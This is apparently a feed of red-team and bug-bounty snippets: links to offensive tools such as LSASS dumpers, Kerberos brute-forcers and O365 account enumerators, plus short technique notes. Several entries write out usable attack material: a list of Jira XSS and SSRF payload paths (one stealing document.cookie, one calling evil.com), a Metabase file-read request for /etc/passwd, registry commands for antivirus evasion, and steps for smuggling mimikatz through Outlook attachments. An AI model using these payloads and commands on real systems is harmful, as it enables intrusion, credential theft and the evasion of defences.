KerbMon

Continuous kerberoast monitor

https://github.com/Retrospected/kerbmon

#kerberos #monitor #pentest

OffensiveRust — Rust Weaponization for Red Team Engagements.

Examples in this repo:

• Allocate_With_Syscalls — It uses NTDLL functions directly with the ntapi Library
• Create_DLL — Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
• DeviceIoControl — Opens driver handle and executing DeviceIoControl
• EnableDebugPrivileges — Enable SeDebugPrivilege in the current process
• Shellcode_Local_inject — Executes shellcode directly in local process by casting pointer
• Execute_With_CMD — Executes cmd by passing a command via Rust
• ImportedFunctionCall — It imports minidump from dbghelp and executes it
• Kernel_Driver_Exploit — Kernel Driver exploit for a simple buffer overflow
• Named_Pipe_Client — Named Pipe Client
• Named_Pipe_Server — Named Pipe Server
• Process_Injection_CreateThread — Process Injection in remote process with CreateRemoteThread
• Unhooking — Unhooking calls
• asm_syscall — Obtaining PEB address via asm
• base64_system_enum — Base64 encoding/decoding strings
• http-https-requests — HTTP/S requests by ignoring cert check for GET/POST
• patch_etw — Patch ETW
• ppid_spoof — Spoof parent process for created process
• tcp_ssl_client — TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
• tcp_ssl_server — TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
• wmi_execute — Executes WMI query to obtain the AV/EDRs in the host
• Windows.h+ Bindings — This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
• UUID_Shellcode_Execution — Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

https://github.com/trickster0/OffensiveRust

#rust #redteam #malware

Oh365 User Finder

Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to identify the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid.

https://github.com/dievus/Oh365UserFinder

#office365 #user #enumeration

Default Passwords

Before performing password attacks, it is worth trying a couple of default passwords against the targeted service. Here are some website that provide default passwords for various products.

# https://cirt.net/passwords
# https://default-password.info/
# https://datarecovery.com/rd/default-passwords/

#default #passwords #services

When You sysWhisper Loud Enough for AV to Hear You

https://captmeelo.com/redteam/maldev/2021/11/18/av-evasion-syswhisper.html

#av #evasion #syswhisper

Microsoft Exchange Deserialization RCE (CVE-2021–42321)

https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852

#exchange #rce #cve #deserialization

Atlassian Jira Payloads

/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/ViewUserHover.jspa?username=Admin
/rest/api/2/dashboard?maxResults=100
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
/rest/api/2/user/picker?query=admin
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/secure/ContactAdministrators!default.jspa

#bugbounty #jira #payloads

GPUSleep

Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep.

# https://github.com/oXis/GPUSleep
# https://oxis.github.io/GPUSleep/

#redteam #gpu #sleep #beacon

Windows Privileges

https://speakerdeck.com/fr0gger/windows-privileges

#windows #privileges #cheatsheet

Cloudmare

Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS.

https://github.com/MrH0wl/Cloudmare

#bugbounty #cloudflare #tracker #ip

CVE-2021-41277 MetaBase Arbitrary File Read

PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1

#metabase #cve #poc

Microsoft Exchange Server RCE (PoC)

This PoC just pop mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack event

https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398

#exchange #rce #poc

Bypass AV via Change Filenames/Extension

You need to change the files extension:
.eyb files as .exe
.faq files as .dll

Use the following commands:

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /ve /t REG_SZ /d exefile
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /v "Content Type" /t REG_SZ /d "application/x-msdownload"

This can also work on other security solutions and for many other blacklisted techniques.

#av #evasion #extension #file

Windows installer LPE 0day

https://github.com/klinix5/InstallerFileTakeOver

#windows #lpe #0day

DumpNParse

DumpNParse is a tool that will automatically dump LSASS and parse the results.

https://github.com/icyguider/DumpNParse

#lsass #dump #parse

InfoSec BlackFriday Offers

- Books
- Courses
- Services
- Software
- Hardware

https://github.com/0x90n/InfoSec-Black-Friday

#BlackFriday #InfoSec

Picky PPID Spoofing

Parent Process ID (PPID) Spoofing is one of the techniques employed by malware authors to blend in the target system. This is done by making the malicious process look like it was spawned by another process. This helps evade detections that are based on anomalous parent-child process relationships.

https://capt-meelo.github.io//redteam/maldev/2021/11/22/picky-ppid-spoofing.html

#pid #spoofing #redteam #maldev #malware

Clipboard Shellcode Injection

https://gist.github.com/leftp/d89ddc4651a828333d9c0ca5681d1fc8

#clipboard #shellcode #injection #redteam #maldev

pyKerbrute

Use Python to quickly brute force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (supports Pass-the-Hash)

https://github.com/3gstudent/pyKerbrute

#ad #kerberos #spray

Outlook Attachments

Attackers can compose an email on Outlook (or O365) and attach a file and then use the file's download link to directly download the file. Restricted file types would first need to have their file extension modified (e.g. mimikatz.exe becomes mimikatz.exe.txt) and then upon download the file extension is modified back to the original extension.

1. Compose an email
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment.outlook.live.net or attachment.office.net)

Link is valid for ~15 minutes.

#outlook #attachments #redteam #phishing

CVE Trends

CVE Trends gathers crowdsourced intel about CVEs from Twitter's filtered stream API and combines it with data from NIST's NVD and GitHub APIs.

https://cvetrends.com

#cve #trends #monitor